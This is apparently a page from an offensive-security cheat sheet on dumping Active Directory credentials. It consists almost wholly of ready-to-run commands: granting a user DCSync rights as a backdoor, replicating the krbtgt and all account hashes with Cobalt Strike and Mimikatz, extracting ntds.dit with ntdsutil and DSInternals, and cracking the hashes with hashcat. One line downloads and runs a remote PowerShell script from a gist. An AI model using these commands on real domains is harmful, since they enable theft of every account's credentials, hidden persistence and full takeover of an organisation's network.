DCSync Backdoor

# Enumerate
Get-DomainObjectAcl -ResolveGUIDs | where {$_.ObjectDN -eq "DC=Marvel,DC=local" -and $_.ObjectAceType -match "DS-Replication"} | select ActiveDirectoryRights,ObjectAceType,SecurityIdentifier 

# Command
Add-DomainObjectAcl -TargetIdentity "DC=marvel,DC=local" -PrincipalIdentity user4 -Rights DCSync

beacon> dcsync dev.cyberbotic.io DEV\krbtgt

NTDS Dump

NTDSutil

ntdsutil
activate instance ntds
ifm
create full C:\audit
quit
quit

Then use the DSInternals script to extract all the hashed from this dump.

# https://github.com/MichaelGrafnetter/DSInternals/releases/latest

Import-Module .\DSInternals.psd1
$key = Get-BootKey -SystemHiveFilePath '.\audit\registry\SYSTEM'
Get-ADDBAccount -All -DBPath '.\audit\Active Directory\ntds.dit' -BootKey $key | Format-Custom -View HashcatNT | Out-File hashes.txt -Encoding ascii

Mimikatz

lsadump::dcsync /domain:marvel.local /all /csv

Invoke DCSync

# https://gist.githubusercontent.com/monoxgas/9d238accd969550136db/raw/7806cc26744b6025e8f1daf616bc359cb6a11965/Invoke-DCSync.ps1

IEX (New-Object Net.WebClient).DownloadString("https://gist.githubusercontent.com/monoxgas/9d238accd969550136db/raw/7806cc26744b6025e8f1daf616bc359cb6a11965/Invoke-DCSync.ps1");
Invoke-DCSync -PWDumpFormat

Cracking

hashcat.exe -m 1000 -a 0 hashes.txt rockyou.txt

PreviousDomain Dominance NextAdminSDHolder

Last updated 3 years ago